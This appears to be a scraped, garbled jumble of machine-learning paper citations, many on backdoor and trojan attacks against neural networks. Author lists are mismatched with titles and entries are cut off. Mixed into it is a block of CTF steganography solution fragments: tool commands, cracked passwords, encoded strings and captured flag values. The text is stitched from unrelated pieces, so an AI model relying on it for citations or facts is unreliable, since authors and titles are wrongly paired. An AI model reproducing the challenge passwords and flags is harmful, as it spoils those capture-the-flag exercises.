Tim Vieira and Ryan Cotterell, Towards Robustness of Text-to-SQL Models against Synonym Substitution
Viet Anh Trinh and Alla Rozovskaya, Effective Attention Sheds Light On Interpretability arXiv, 2022. [code], Fine-Pruning: Defending Against Backdooring Attacks on Deep Neural Networks. Vardaan Pahuja, Yu Gu, Wenhu Chen, Mehdi Bahrami, Lei Liu, Wei-Peng Chen and Yu Su, Compare to The Knowledge: Graph Neural Fake News Detection with External Knowledge Bo Zhang, Xiaoming Zhang, Yun Liu, Lei Cheng and Zhoujun Li, Changes in European Solidarity Before and During COVID-19: Evidence from a Large Crowd- and Expert-Annotated Twitter Dataset [link], An Interpretive Perspective: Adversarial Trojaning Attack on Neural-Architecture-Search Enabled Edge AI Systems. Linyi Yang, Jiazheng Li, Padraig Cunningham, Yue Zhang, Barry Smyth and Ruihai Dong, Detecting Propaganda Techniques in Memes Workshop homepage: https://ethics-workshop.github.io/2023. Ruitao Hou, Shan Ai, Qi Chen, Hongyang Yan, Teng Huang, and Kongyang Chen. Kuofeng Gao, Jiawang Bai, Bin Chen, Dongxian Wu, and Shu-Tao Xia. Sachin Kumar, Antonios Anastasopoulos, Shuly Wintner and Yulia Tsvetkov, On Positivity Bias in Negative Reviews Ximing Qiao, Yuhua Bai, Siping Hu, Ang Li, Yiran Chen, and Hai Li. [link], Textual Backdoor Attack for the Text Classification System. Jiannan Xiang, Yahui Liu, Deng Cai, Huayang Li, Defu Lian and Lemao Liu, Structure-Aware Pre-Training for Table-to-Text Generation Phung Lai, NhatHai Phan, Abdallah Khreishah, Issa Khalil, and Xintao Wu. Shikhar Singh, Nuan Wen, Yu Hou, Pegah Alipoormolabashi, Te-lin Wu, Xuezhe Ma and Nanyun Peng, Towards Knowledge-Grounded Counter Narrative Generation for Hate Speech Khalil Mrini, Emilia Farcas and Ndapa Nakashole, AdaTag: Multi-Attribute Value Extraction from Product Profiles with Adaptive Decoding Hao Zhang, Aixin Sun, Wei Jing, Liangli Zhen, Joey Tianyi Zhou and Siow Mong Rick Goh, MusicBERT: Symbolic Music Understanding with Large-Scale Pre-Training Thanh-Tung Nguyen, Xuan-Phi Nguyen, Shafiq Joty and Xiaoli Li, Reliability Testing for Natural Language Processing Systems Panagiota Kiourti, Kacper Wardega, Susmit Jha, and Wenchao Li. [code], Rethinking the Backdoor Attacks' Triggers: A Frequency Perspective. Jing Xu, Minhui, Xue, and Stjepan Picek. [pdf] Xiangyu Qi, Tinghao Xie, Ruizhe Pan, Jifeng Zhu, Yong Yang, and Kai Bu. Xuan Chen, Yuena Ma, Shiwei Lu, and Yu Yao. Elizabeth Clark, Tal August, Sofia Serrano, Nikita Haduong, Suchin Gururangan and Noah A. Smith, Intrinsic Dimensionality Explains the Effectiveness of Language Model Fine-Tuning [pdf], Membership Inference via Backdooring. Fengbin Zhu, Wenqiang Lei, Youcheng Huang, Chao Wang, Shuo Zhang, Jiancheng Lv, Fuli Feng and Tat-Seng Chua, SMURF: SeMantic and linguistic UndeRstanding Fusion for Caption Evaluation via Typicality Analysis [code], Februus: Input Purification Defense Against Trojan Attacks on Deep Neural Network Systems. [pdf], Backdoor Attack in the Physical World. [pdf], Hidden Trigger Backdoor Attacks. Yan Zeng and Jian-Yun Nie, Learning to Sample Replacements for ELECTRA Pre-Training Haoqi Wang, Mingfu Xue, Shichang Sun, Yushu Zhang, Jian Wang, and Weiqiang Liu. Demons in the Shared Kernel: Abstract Resource Attacks Against OS-level Virtualization. Comparing data augmentation strategies for the automated scoring of childrens mindreading ability Lanqing Xue, Kaitao Song, Duocai Wu, Xu Tan, Nevin L. Zhang, Tao Qin, Wei-Qiang Zhang and Tie-Yan Liu, CIL: Contrastive Instance Learning Framework for Distantly Supervised Relation Extraction [link], Bridging Mode Connectivity in Loss Landscapes and Adversarial Robustness. arXiv, 2022. @:s-base85() key:Camouflage,sapphire .jpg,Free_File_Camouflage, docxXiAo_1U,webp, webpstegpy: pip3 install stegpy, D:\Python38>stegpy C:\Users\xxxxx\Desktop\csgo.webp bugku{rea1ly_miss_yoU}, Cattle.jpgforemost11549.zipMiscellaneous-300, 1000bugku.zip(2314.zipbugku) rockyou letsgetiton,Cattle.jpgflag, .pngStegsolvelsb winhex 4030B405,504B0304,zip,winhex1.zipwinrar7z360, flag128.png bugku{} flag, this is password: y 20 p m 12 9 c 1 pay attention: alphabet(lower case)>num num>alphabet(capital letter) /no hint more happiness/, :25 T 16 13 L I 3 A,, usb tshark, gnuplot() gnuplotsudo apt-get install gnuplot, word N65t92c8,.txtwinhex.txt linuxvimtxt : base62password:happyoxday, -.jpg ()htpchbar txt, Aztec Code,googleflag, txt6 :bugku_youareprettygood, next zip passwd.png , , ,(0):012369849 flag.exepasswd and mark=0.jpgwinhexflag.exezip,, winhexjpg(pngbase64) jpg a1s2d3f4g5 flag, 010editor 504B,zip504B0304 U1S1: ,28 whereisflag, 00111 1010 00001 0 11110 00011 100 100 11100 00111 11111 1000 1010 01 01 1000 100 00000 00000 00111 0 11000 00001 00000 11000 1000 10000 11110 11111 11100 0010 10000 , 2md5, MTM4NDAwMjE4MTYxNTg5Nzc2ODk2NzcxOTYyMTQzMTgzMzcwNjU0Njg0NDU1MTk4MzcwOTk3ODA3NDU1MDUzMjI1OTc5MTI2Mj UxMDM4MjY3MDU5NzU4OTQ0MzAxNTQ2Nzg0OTU2MTY1NTUxMTQ4MDMxNzE4MDg4NzM4ODA1MzgyNDgyOTE0MTEwMTA5MzMxNTI4Mzg0OTI4OTM5MzgxMjg3MzA2MDE4NjExNDEyNTE2ODM4MzcyNjUzMzkz, 138400218161589776896771962143183370654684455198370997807455053225979126251038267059758944301546784956165551148031718088738805382482914110109331528384928939381287306018611412516838372653393, ASCII,, 62525*25, 3 password.png, IXE1VDYmMjk=,base64!q5T6&29, password.pngforemost mumuzicPython, winhexjpgFFD8FFE0jpg Stegsolveflag, () wingdingword , hexstrwordSansSerif, Webdings,qq, stegsolveRedGreen 80715RG01GR10, sqlhttp704byte flag flagflag{e62d3da86fe34a83bbfbdb9d3177a641}, 010editorjpg ahu.rarhint.txtkey.png7z(Find me). Jun Xu, Zeyang Lei, Haifeng Wang, Zheng-Yu Niu, Hua Wu and Wanxiang Che, LayoutLMv2: Multi-modal Pre-training for Visually-rich Document Understanding Ka Wong, Praveen Paritosh and Lora Aroyo, Select, Extract and Generate: Neural Keyphrase Generation with Layer-wise Coverage Attention If nothing happens, download GitHub Desktop and try again. Muhammad Umer, Glenn Dawson, Robi Polikar. [pdf], BadDet: Backdoor Attacks on Object Detection. Omid Aramoon, Pin-Yu Chen, Gang Qu, and Yuan Tian. Wenpeng Yin, Dragomir Radev and Caiming Xiong, Are Multilingual Models the Best Choice for Moderately Under-resourced Languages? Provably Secure Generative Linguistic Steganography Siyu Zhang, Zhongliang Yang, Jinshuai Yang and Yongfeng Huang. Qiushi Wu*, Yue Xiao*, Xiaojing Liao, and Kangjie Lu. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Junkun Chen, Mingbo Ma, Renjie Zheng and Liang Huang, Analyzing Code Embeddings for Coding Clinical Narratives [pdf], Planting Undetectable Backdoors in Machine Learning Models. [pdf], Model-Contrastive Learning for Backdoor Defense. Chun Chen and Fang Kong, Coreference Resolution without Span Representations Cheng Wang, Sungjin Lee, Sunghyun Park, Han Li, Young-Bum Kim and Ruhi Sarikaya, Better Robustness by More Coverage: Adversarial and Mixup Data Augmentation for Robust Finetuning [code], Intrinsic Certified Robustness of Bagging against Data Poisoning Attacks Investigating the Negative Impact of Outliers on Active Learning for Visual Question Answering (2017). Leyang Cui, Yu Wu, Jian Liu, Sen Yang and Yue Zhang, Does it Matter When I Think You Are Lying? Improving Deception Detection by Integrating Interlocutors Judgements in Conversations Dove, A. Hiroshi Noji and Yohei Oseki, Verb Sense Clustering using Contextualized Word Representations for Semantic Frame Induction SONIC visualizer easily shows you spectrogram. [link], Similarity-based Integrity Protection for Deep Learning Systems. Shiyue Zhang, Asli Celikyilmaz, Jianfeng Gao and Mohit Bansal, The R-U-A-Robot Dataset: Helping Avoid Chatbot Deception by Detecting User Questions About Human or Non-Human Identity Hui Jiang, Chulun Zhou, Fandong Meng, Biao Zhang, Jie Zhou, Degen Huang, Qingqiang Wu and Jinsong Su, Learning Dense Representations of Phrases at Scale Maxime Peyrard, Wei Zhao, Steffen Eger and Robert West, Modeling Fine-Grained Entity Types with Box Embeddings arXiv, 2022. Vamsi Aribandi, Yi Tay and Donald Metzler, Cross-Lingual Cross-Domain Nested Named Entity Evaluation on English Web Texts Valentin Hofmann, Janet Pierrehumbert and Hinrich Schtze, RADDLE: An Evaluation Benchmark and Analysis Platform for Robust Task-oriented Dialog Systems Xin Liu, Baosong Yang, Dayiheng Liu, Haibo Zhang, Weihua Luo, Min Zhang, Haiying Zhang and Jinsong Su, How Did This Get Funded?! Potsawee Manakul and Mark Gales, Claim Matching Beyond English to Scale Global Fact-Checking XIAO Steganography [pdf], Can You Really Backdoor Federated Learning? Songlin Yang, Yanpeng Zhao and Kewei Tu, Surprisal Estimators for Human Reading Times Need Character Models Detecting Kernel Memory Leaks in Specialized Modules with Ownership Reasoning. arXiv, 2022. Eitan Borgnia, Valeriia Cherepanova, Liam Fowl, Amin Ghiasi, Jonas Geiping, Micah Goldblum, Tom Goldstein, and Arjun Gupta. (2022, January 31). [code], Spinning Language Models: Risks of Propaganda-as-a-Service and Countermeasures [Master Thesis], Deep Feature Space Trojan Attack of Neural Networks by Controlled Detoxification. Andrew Halterman, Katherine Keith, Sheikh Sarwar and Brendan OConnor, Memory-Efficient Differentiable Transformer Architecture Search !is_numeric Xiaofei Ma, Cicero Nogueira Dos Santos and Andrew O. Arnold, Cross-Lingual Transfer in Zero-Shot Cross-Language Entity Linking arXiv, 2022. Kuntal Kumar Pal, Kazuaki Kashihara, Pratyay Banerjee, Swaroop Mishra, Ruoyu Wang and Chitta Baral, Cluster-Former: Clustering-based Sparse Transformer for Question Answering Chenliang Li, Bin Bi, Ming Yan, Wei Wang and Songfang Huang, Counterfactuals to Control Latent Disentangled Text Representations for Style Transfer Retrieved January 29, 2021. Xiaoyang Wang, Dimitrios Dimitriadis, Sanmi Koyejo, and Shruti Tople.